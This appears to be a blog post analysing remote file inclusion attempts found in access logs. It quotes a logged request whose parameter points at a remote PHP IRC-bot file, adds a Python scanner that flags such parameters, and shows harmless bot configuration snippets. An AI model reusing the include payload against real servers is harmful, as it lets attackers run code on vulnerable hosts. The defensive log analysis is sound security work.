Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following:

/include/mail.inc.php?skin_board_path=http://website/j1.txt

Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here, but it’s likely a local file inclusion-type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL, or embedded in the current page at the current URL.
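As an added example (not part of the original post), here is a small log scanner that flags the pattern seen in the request above: a query parameter whose value is a full URL to a remote file. The log lines, IP addresses and file names below are constructed for the example; the parser assumes the common Apache/nginx "combined" log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" log format (not taken from the post).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /include/mail.inc.php?skin_board_path=http://website/j1.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=ftp://203.0.113.9/x.txt HTTP/1.1" 404 300 "-" "curl/7.88"
192.0.2.3 - - [10/Oct/2023:13:57:12 +0000] "GET /redirect.php?url=https%3A%2F%2Fexample.org%2Fpage HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP and the "METHOD target PROTOCOL" request field.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# URL-wrapper schemes that should never show up in a parameter meant to hold a local path.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "data:", "php://")


def remote_include_params(target):
    """Return [(name, value)] for query parameters whose value points at a remote resource."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Return (ip, path, param, value) for every request carrying a remote URL in a parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path = urlsplit(m.group("target")).path
        for name, value in remote_include_params(m.group("target")):
            findings.append((m.group("ip"), path, name, value))
    return findings


if __name__ == "__main__":
    for ip, path, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {path}: parameter {name!r} references {value}")
```

Parameters that legitimately carry URLs (redirect targets, callbacks) will also match, as the last sample line shows, so in practice you allowlist those parameter names per application and treat the rest as include attempts worth investigating.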

Full Disclosure: The Bot Source

In light of full disclosure I’m posting the bot here for your enjoyment. You’ll notice that the bot isn’t very sophisticated and basically just allows for basic IRC commands and proxy-like features, such as sending messages as the bot.

Here are some short teaser snippets.

Snippet 1 (comments translated from Indonesian):

```php
function hajar() {

    $channels = '#teamhack #jombang'; // Separate with spaces

    $localtest = 0;   // 1 = test on localhost; 0 = connect to the IRC server
    $showrespone = 0; // 1 = display the responses from the IRC server
```

Snippet 2 (comments translated from Indonesian):

```php
// IRC server
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
    $remotehost2 = array(
        "**************"
    );
}
$port = "6667";
// Messages
$awaymsg = '4[[6TeamHacK 8LaBoRaToRiuMz12]]';
```

You can find the full source code here.